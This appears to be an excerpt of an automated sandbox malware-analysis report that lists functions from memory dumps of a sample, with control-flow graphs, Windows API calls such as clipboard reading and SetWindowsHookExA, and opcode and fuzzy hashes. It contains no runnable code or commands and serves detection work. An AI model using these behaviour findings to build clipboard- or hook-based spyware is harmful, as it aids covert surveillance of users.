                                control_flow_graph 1036 60e896e-60e89de 1038 60e89e9-60e89f0 1036->1038 1039 60e89e0-60e89e6 1036->1039 1040 60e89fb-60e8a33 1038->1040 1041 60e89f2-60e89f8 1038->1041 1039->1038 1042 60e8a3b-60e8a9a CreateWindowExW 1040->1042 1041->1040 1043 60e8a9c-60e8aa2 1042->1043 1044 60e8aa3-60e8adb 1042->1044 1043->1044 1048 60e8add-60e8ae0 1044->1048 1049 60e8ae8 1044->1049 1048->1049 1050 60e8ae9 1049->1050 1050->1050
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 060E8A8A
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2548454833.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_60e0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: e117efe39a4a0b090f3893073045992a42ae48afb42c53939ce7cdb10330fbeb
                                • Instruction ID: 00e4852941f8a61e931bf9f411062c6e71105f467b91df3f8196e140fdf9e4c2
                                • Opcode Fuzzy Hash: e117efe39a4a0b090f3893073045992a42ae48afb42c53939ce7cdb10330fbeb
                                • Instruction Fuzzy Hash: CC51AFB1D003199FDB54CF9AC884ADEBFB5FF48310F24852AE819AB250D7759885CF90
                                Function 060E8978 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1051 60e8978-60e89de 1052 60e89e9-60e89f0 1051->1052 1053 60e89e0-60e89e6 1051->1053 1054 60e89fb-60e8a9a CreateWindowExW 1052->1054 1055 60e89f2-60e89f8 1052->1055 1053->1052 1057 60e8a9c-60e8aa2 1054->1057 1058 60e8aa3-60e8adb 1054->1058 1055->1054 1057->1058 1062 60e8add-60e8ae0 1058->1062 1063 60e8ae8 1058->1063 1062->1063 1064 60e8ae9 1063->1064 1064->1064
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 060E8A8A
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2548454833.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_60e0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: 4c4906d8c97358e5547d83eefad9d1428d92c9fb738ee5391b9ccccf22c10fbe
                                • Instruction ID: 60df1cc65af4a638f3c4f9830d16ea0cab0b28984afacd1ff7fefa456560faf6
                                • Opcode Fuzzy Hash: 4c4906d8c97358e5547d83eefad9d1428d92c9fb738ee5391b9ccccf22c10fbe
                                • Instruction Fuzzy Hash: 52419EB1D003199FDB54CF9AD884ADEBFB5FF48310F24812AE819AB250D7759985CF90
                                Function 060EC28C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1065 60ec28c-60ed5a4 1068 60ed5aa-60ed5af 1065->1068 1069 60ed654-60ed674 call 60e6c24 1065->1069 1071 60ed602-60ed63a CallWindowProcW 1068->1071 1072 60ed5b1-60ed5e8 1068->1072 1076 60ed677-60ed684 1069->1076 1073 60ed63c-60ed642 1071->1073 1074 60ed643-60ed652 1071->1074 1079 60ed5ea-60ed5f0 1072->1079 1080 60ed5f1-60ed600 1072->1080 1073->1074 1074->1076 1079->1080 1080->1076
                                APIs
                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 060ED629
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2548454833.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_60e0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: CallProcWindow
                                • String ID:
                                • API String ID: 2714655100-0
                                • Opcode ID: 8dfb336b9de3d3c69270d43711bcbb1d6f840ffc321ef3d30ef1a442c11609b2
                                • Instruction ID: 212f92900607bf0053d599bf7df8ebfd1f810c71d852d0874a82067d366ab8dd
                                • Opcode Fuzzy Hash: 8dfb336b9de3d3c69270d43711bcbb1d6f840ffc321ef3d30ef1a442c11609b2
                                • Instruction Fuzzy Hash: 744159B5A00319CFDB54CF99C488BAABBF5FF88314F248459E419AB361D735A841CFA0
                                Function 060EE2AC Relevance: 1.6, APIs: 1, Instructions: 79comclipboardCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1082 60ee2ac-60ee2b4 1083 60ee2b6-60ee2ff 1082->1083 1084 60ee300-60ee308 1082->1084 1083->1084 1086 60ee312-60ee350 OleGetClipboard 1084->1086 1087 60ee359-60ee3a7 1086->1087 1088 60ee352-60ee358 1086->1088 1093 60ee3a9-60ee3ad 1087->1093 1094 60ee3b7 1087->1094 1088->1087 1093->1094 1095 60ee3af 1093->1095 1096 60ee3b8 1094->1096 1095->1094 1096->1096
                                APIs
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2548454833.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_60e0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: Clipboard
                                • String ID:
                                • API String ID: 220874293-0
                                • Opcode ID: 55be0500532521172bf01deef07d5ea417cac1ee38598dc67fcef286a1921801
                                • Instruction ID: f5b2c8342c7de5622fad8c495def49d8a7f90722b530614ef53b3459129d3129
                                • Opcode Fuzzy Hash: 55be0500532521172bf01deef07d5ea417cac1ee38598dc67fcef286a1921801
                                • Instruction Fuzzy Hash: A131E4B0D0135DDFDB54CFA9C848BDDBFF5AB48304F248029E444AB2A1DBB59885CB65
                                Function 060EDCA8 Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1097 60edca8-60ee350 OleGetClipboard 1101 60ee359-60ee3a7 1097->1101 1102 60ee352-60ee358 1097->1102 1107 60ee3a9-60ee3ad 1101->1107 1108 60ee3b7 1101->1108 1102->1101 1107->1108 1109 60ee3af 1107->1109 1110 60ee3b8 1108->1110 1109->1108 1110->1110
                                APIs
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2548454833.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_60e0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: Clipboard
                                • String ID:
                                • API String ID: 220874293-0
                                • Opcode ID: 145f6be71763ba6d481a72cdc911b3fd26d9655287244b073a35d11f0879097d
                                • Instruction ID: a2b4bbbf281476fed2efbaa08807d0b2a245d7177453a1eeba9967478bf3e912
                                • Opcode Fuzzy Hash: 145f6be71763ba6d481a72cdc911b3fd26d9655287244b073a35d11f0879097d
                                • Instruction Fuzzy Hash: 2C31E5B0D4131CDFDB54CFA9C948B9EBBF5AB48304F248029E404BB390DBB59885CB95
                                Function 060EC6D0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1111 60ec6d0-60ec76c DuplicateHandle 1112 60ec76e-60ec774 1111->1112 1113 60ec775-60ec792 1111->1113 1112->1113
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 060EC75F
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2548454833.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_60e0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 1b7ca82a2e8f73e0f0084b634e872546c39fe81042b8118a152d7fa705dac118
                                • Instruction ID: 7b330fe8341fd0e2e4c0ffaaabd8270434bf72f1704b8370379f2e4dce651951
                                • Opcode Fuzzy Hash: 1b7ca82a2e8f73e0f0084b634e872546c39fe81042b8118a152d7fa705dac118
                                • Instruction Fuzzy Hash: 6121E6B5D002499FDB10CFA9D884AEEBFF5FB48310F14841AE958A7350D375A955CF60
                                Function 060EC6D8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1116 60ec6d8-60ec76c DuplicateHandle 1117 60ec76e-60ec774 1116->1117 1118 60ec775-60ec792 1116->1118 1117->1118
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 060EC75F
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2548454833.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_60e0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 43e110fbc42abc8a6b29fe2d4385421261a515c86229922ee04a11b2936855e7
                                • Instruction ID: 53733aa6ffca8e0bc4cd35c86f23d44565a89fc8e1217596bfb93316aa0c532b
                                • Opcode Fuzzy Hash: 43e110fbc42abc8a6b29fe2d4385421261a515c86229922ee04a11b2936855e7
                                • Instruction Fuzzy Hash: AB21E4B59003089FDB10CFAAD884ADEBBF4FB48310F14802AE954A7350D375A944CFA0
                                Function 060EFE03 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1121 60efe03-60efe52 1124 60efe5e-60efe90 SetWindowsHookExA 1121->1124 1125 60efe54-60efe5c 1121->1125 1126 60efe99-60efeb9 1124->1126 1127 60efe92-60efe98 1124->1127 1125->1124 1127->1126
                                APIs
                                • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 060EFE83
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2548454833.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_60e0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: HookWindows
                                • String ID:
                                • API String ID: 2559412058-0
                                • Opcode ID: af415868c2aac8c06ad8c48262f425bc20662875a9e5975547b85851456f8408
                                • Instruction ID: abb2545ed172637de0f472b413769af3c46177eab54a84c030e8175e62cbb01b
                                • Opcode Fuzzy Hash: af415868c2aac8c06ad8c48262f425bc20662875a9e5975547b85851456f8408
                                • Instruction Fuzzy Hash: 962147B1D002199FDB54CFAAC844BEEFBF5BB88320F10842AE458A7250C774A940CFA0
                                Function 060EFE08 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1131 60efe08-60efe52 1133 60efe5e-60efe90 SetWindowsHookExA 1131->1133 1134 60efe54-60efe5c 1131->1134 1135 60efe99-60efeb9 1133->1135 1136 60efe92-60efe98 1133->1136 1134->1133 1136->1135
                                APIs
                                • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 060EFE83
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2548454833.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_60e0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: HookWindows
                                • String ID:
                                • API String ID: 2559412058-0
                                • Opcode ID: c17e4a0a03e310fd45eb5ff06872f6561132d1d0213d39ae2f104bc2fa6a6daf
                                • Instruction ID: 48be23d9a1b39bdab1fcbd93e874d4ba91d26ed910cb15087da516f37e5188c1
                                • Opcode Fuzzy Hash: c17e4a0a03e310fd45eb5ff06872f6561132d1d0213d39ae2f104bc2fa6a6daf
                                • Instruction Fuzzy Hash: 472124B5D002199FDB54CFAAC844BEEFBF5BB88320F10842AE458A7250D774A944CFA1
                                Function 060E5E3C Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1140 60e5e3c-60e7910 1142 60e7918-60e7943 GetModuleHandleW 1140->1142 1143 60e7912-60e7915 1140->1143 1144 60e794c-60e7960 1142->1144 1145 60e7945-60e794b 1142->1145 1143->1142 1145->1144
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 060E7936
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2548454833.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_60e0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: f6593f62359151c2a7a91a885635de46a282a158ec70fa6eea6c44376e51b806
                                • Instruction ID: e187927a4b8f3ea6032ff80e7d479c311ca420daa3057fa4b645d145c0c5f5a8
                                • Opcode Fuzzy Hash: f6593f62359151c2a7a91a885635de46a282a158ec70fa6eea6c44376e51b806
                                • Instruction Fuzzy Hash: 0F11FDB5C006598FDB60CF9AC844B9EFBF4EF88220F10846AD869A7610D379A545CFA1
                                Function 060EE169 Relevance: 1.5, APIs: 1, Instructions: 47comCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1147 60ee169-60ee16e 1148 60ee170-60ee1d2 OleInitialize 1147->1148 1149 60ee1db-60ee1f8 1148->1149 1150 60ee1d4-60ee1da 1148->1150 1150->1149
                                APIs
                                • OleInitialize.OLE32(00000000), ref: 060EE1C5
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2548454833.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_60e0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: Initialize
                                • String ID:
                                • API String ID: 2538663250-0
                                • Opcode ID: 2ba0959af52fab561182bf43796cece797dadb6dcef4490c1047c3bf390bee5e
                                • Instruction ID: 8b206525cbc2f542204b26b1b6ba5d1c80d30658de7826392c5f620535329544
                                • Opcode Fuzzy Hash: 2ba0959af52fab561182bf43796cece797dadb6dcef4490c1047c3bf390bee5e
                                • Instruction Fuzzy Hash: E51115B58003498FDB50CFAAC844BDEFFF4EB48324F248469D559A7610C375A544CFA5
                                Function 060EC2E4 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                Download Yara Rule
                                APIs
                                • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,060ED87D), ref: 060ED907
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2548454833.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_60e0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: CallbackDispatcherUser
                                • String ID:
                                • API String ID: 2492992576-0
                                • Opcode ID: 46a270ffb36d0e6cbbe8f0528235ebf271f1ac108c6215a542a22e1b4f75ef24
                                • Instruction ID: 20323449672a044881ff3cd77393905a93d0f449526e1516405feab8192e9a4a
                                • Opcode Fuzzy Hash: 46a270ffb36d0e6cbbe8f0528235ebf271f1ac108c6215a542a22e1b4f75ef24
                                • Instruction Fuzzy Hash: CC11F2B18007598FDB50DF9AD984B9EBBF4EB49310F20842AD559A7250C378A944CFA5
                                Function 060EDB90 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                Download Yara Rule
                                APIs
                                • OleInitialize.OLE32(00000000), ref: 060EE1C5
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2548454833.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_60e0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: Initialize
                                • String ID:
                                • API String ID: 2538663250-0
                                • Opcode ID: f21b8acbb7106e79f0e41519d8c370c653505fd849f715ebf871350bc258f595
                                • Instruction ID: 7d12e40998aac71a0dc97759f8841303cc56f4821f6f0c5ad9a1bc34a3224a30
                                • Opcode Fuzzy Hash: f21b8acbb7106e79f0e41519d8c370c653505fd849f715ebf871350bc258f595
                                • Instruction Fuzzy Hash: 861106B58007498FDB50DF9AC444BDEBBF4EB48310F20846AD559A7600D375A584CFA5
                                Function 060E78CA Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1153 60e78ca-60e7910 1154 60e7918-60e7943 GetModuleHandleW 1153->1154 1155 60e7912-60e7915 1153->1155 1156 60e794c-60e7960 1154->1156 1157 60e7945-60e794b 1154->1157 1155->1154 1157->1156
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 060E7936
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2548454833.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_60e0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: 630d6b303fdb7dda78e1f9f5788337b219e56ea2da4e29c87a9f18f002a6ecd1
                                • Instruction ID: 456f05e8e1274857ef27e82891881286004e0b41d84be77e60980a36f4e6f832
                                • Opcode Fuzzy Hash: 630d6b303fdb7dda78e1f9f5788337b219e56ea2da4e29c87a9f18f002a6ecd1
                                • Instruction Fuzzy Hash: 3011CDB6C006598FDB10CF9AC944BDEBBF4AF48320F15842AD469BB610D379A545CFA1
                                Function 060ED8A1 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                Download Yara Rule
                                APIs
                                • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,060ED87D), ref: 060ED907
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2548454833.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_60e0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: CallbackDispatcherUser
                                • String ID:
                                • API String ID: 2492992576-0
                                • Opcode ID: 9a36b24fd1f7e6f1acddab5ab2dd0645e1db8cf8b4d7c180ffd366ef4a570be8
                                • Instruction ID: 99cb0888d294184fbe7edecdd27d5117c701cb09da66aabb9ee055d9f945d598
                                • Opcode Fuzzy Hash: 9a36b24fd1f7e6f1acddab5ab2dd0645e1db8cf8b4d7c180ffd366ef4a570be8
                                • Instruction Fuzzy Hash: 021100B18003598FDB50CF9AD884BDEBBF4FB48324F20842AD558A7650C7B4A944CFA5
                                Function 01203E8C Relevance: 1.5, Strings: 1, Instructions: 251COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID: \Vek
                                • API String ID: 0-172235318
                                • Opcode ID: 9dfe9771f0429d940915890fb3f98209da5b032e04f9ff8b892b8a7b90f098ef
                                • Instruction ID: 4559ffe9c9ff1fa4f37591f9fc0e25e473e6b823c0c8dc7f4230a89c143a0c12
                                • Opcode Fuzzy Hash: 9dfe9771f0429d940915890fb3f98209da5b032e04f9ff8b892b8a7b90f098ef
                                • Instruction Fuzzy Hash: 0AA19D70E1024ADFDF12DFA8D8857EDBBF2BF48704F148229E614A7291DB749885CB91
                                Function 012014A2 Relevance: 1.3, Strings: 1, Instructions: 57COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID: x
                                • API String ID: 0-2363233923
                                • Opcode ID: af36d3f67bc36e24260dc10e642618c8f90fd70a9fe9c2ae3ca5d11674e0846a
                                • Instruction ID: a69e9005004e34e24787358a044b04b96985ed93b7de5058a71174dbacd73f43
                                • Opcode Fuzzy Hash: af36d3f67bc36e24260dc10e642618c8f90fd70a9fe9c2ae3ca5d11674e0846a
                                • Instruction Fuzzy Hash: 8611A031A112568FDF22EFBC94842ADBBF4EB48354B18057DD905EB282DB36D842CB94
                                Function 012091D8 Relevance: .4, Instructions: 357COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7e8d257a17d51b09653a780a7ada06e32d136365bca571537c2466915034a8a4
                                • Instruction ID: 84e0262d9174511e9f3dd4df2505082ace798c25cabc72fee624e73cee6ab013
                                • Opcode Fuzzy Hash: 7e8d257a17d51b09653a780a7ada06e32d136365bca571537c2466915034a8a4
                                • Instruction Fuzzy Hash: 75D18070A102058FDF15DFA9D9847AEBBB1FB88314F10866AE51AEB293D771DC81CB50
                                Function 01207780 Relevance: .3, Instructions: 311COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 608c41377c4ca1bc96c471deaaa323e1e91c10b2ceb986117a4919a1213d463c
                                • Instruction ID: 3a614aadbab61cfb7b969b9a81cdc4bdfeb64636a99616cb4a0340ed42c2345b
                                • Opcode Fuzzy Hash: 608c41377c4ca1bc96c471deaaa323e1e91c10b2ceb986117a4919a1213d463c
                                • Instruction Fuzzy Hash: 2AB191307112028BDF16A778E99522D77A2EFC9310F108929E146DB386DF36ED82C791
                                Function 01204AA4 Relevance: .3, Instructions: 261COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bc9f1943cd30e472538db7be76a7645be9b0bcc17f048e63bfd1afe13af8f45c
                                • Instruction ID: c2bba80363f8655b18a56af38cb5ef7270aba0a98d4b8ee9701d25dbc87acbb4
                                • Opcode Fuzzy Hash: bc9f1943cd30e472538db7be76a7645be9b0bcc17f048e63bfd1afe13af8f45c
                                • Instruction Fuzzy Hash: 0CA19FB0E1024ACFDB11EFA9D88179DBBF1BF48714F14C629DA14E7295EB749881CB81
                                Function 01206CEA Relevance: .1, Instructions: 132COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fdf6e88c46aa073abeea2a31856567132dd8f3251016f2b8ba0ceb4d8060dc2f
                                • Instruction ID: f0be4f8a158218588a344a3e4d1b819625794b61572a532c824c8f071e6da21b
                                • Opcode Fuzzy Hash: fdf6e88c46aa073abeea2a31856567132dd8f3251016f2b8ba0ceb4d8060dc2f
                                • Instruction Fuzzy Hash: F15104B0D103198FDB15CFA9C885B9DBBB1BF48310F14822AE915BB391D774A844CF95
                                Function 01206CF0 Relevance: .1, Instructions: 132COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1fa5e4d9b6f3d80b8349f9c42e5da829f7c2a5f22bc0e93065b2ee0778feec10
                                • Instruction ID: aab2e114c0a0ca9defbade2f60c817854b677531c5ad23846664d6b2764c1779
                                • Opcode Fuzzy Hash: 1fa5e4d9b6f3d80b8349f9c42e5da829f7c2a5f22bc0e93065b2ee0778feec10
                                • Instruction Fuzzy Hash: A751F5B0D103198FDB15CFA9C845B9DBBB1BF48710F14822AE915BB391D774A844CF95
                                Function 0120112A Relevance: .1, Instructions: 115COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9217433077f281affe1f88b6e6614ff7fd3292781afbe86468fcfcf5adab2747
                                • Instruction ID: 2caf8c797841b98f5d57e12452eff1a9e0ec11216e8944497abe09be314d3143
                                • Opcode Fuzzy Hash: 9217433077f281affe1f88b6e6614ff7fd3292781afbe86468fcfcf5adab2747
                                • Instruction Fuzzy Hash: 3251FA71206282CFDB46FB69FD90B5A3B69BBD6204700996DD000DB27ADE707D59CB82
                                Function 01201138 Relevance: .1, Instructions: 112COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c1b1f3fd3debdf7e296b76b092db65fa6a1545dae3653358435855d3d0183de7
                                • Instruction ID: fed5bf3dbb78ef0d38d8487a05dc847fbccd84f5bbfd5089ebdb543bf1747172
                                • Opcode Fuzzy Hash: c1b1f3fd3debdf7e296b76b092db65fa6a1545dae3653358435855d3d0183de7
                                • Instruction Fuzzy Hash: D851FC71206282CFDB46FB69FD90B563B65BBD6204700996DD000DB27ADE707D59CB82
                                Function 0120EDFD Relevance: .1, Instructions: 109COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9fede2b5bd70f33bac91053385ea07470b476911445351962dfd46cfa0bcd625
                                • Instruction ID: 70c30b5e804cfe4aea3d7fb305d1d2b8380f8312db5fd81c9fd8871d7cb18e44
                                • Opcode Fuzzy Hash: 9fede2b5bd70f33bac91053385ea07470b476911445351962dfd46cfa0bcd625
                                • Instruction Fuzzy Hash: 6A3114307002058FDB06AB78D55876F7BA3AF88650F254A6DD006EB392EF35DC46C791
                                Function 0120ECC0 Relevance: .1, Instructions: 97COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7f484b9140b4d62bc11263e42732ea8779832a1da3dd4324376b33039dea3ad4
                                • Instruction ID: 28f70fc16665a98d91eadd3e3a1444d2be88616ab9732fba4a6934f378f94c71
                                • Opcode Fuzzy Hash: 7f484b9140b4d62bc11263e42732ea8779832a1da3dd4324376b33039dea3ad4
                                • Instruction Fuzzy Hash: 5C317235E102069BDB1ADF68D49469EBBB6FF88300F118919E516E7391EB70AC818B50
                                Function 012071F8 Relevance: .1, Instructions: 95COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cf2c03232edfa74187d79959c4c419d9c2ea8ade8dfc2714d7887956317ebf3a
                                • Instruction ID: 1fbd7ae66e95069d35394c08be381a3a68f9edfdbc09dcb2eb3dd6b8fc30bc1c
                                • Opcode Fuzzy Hash: cf2c03232edfa74187d79959c4c419d9c2ea8ade8dfc2714d7887956317ebf3a
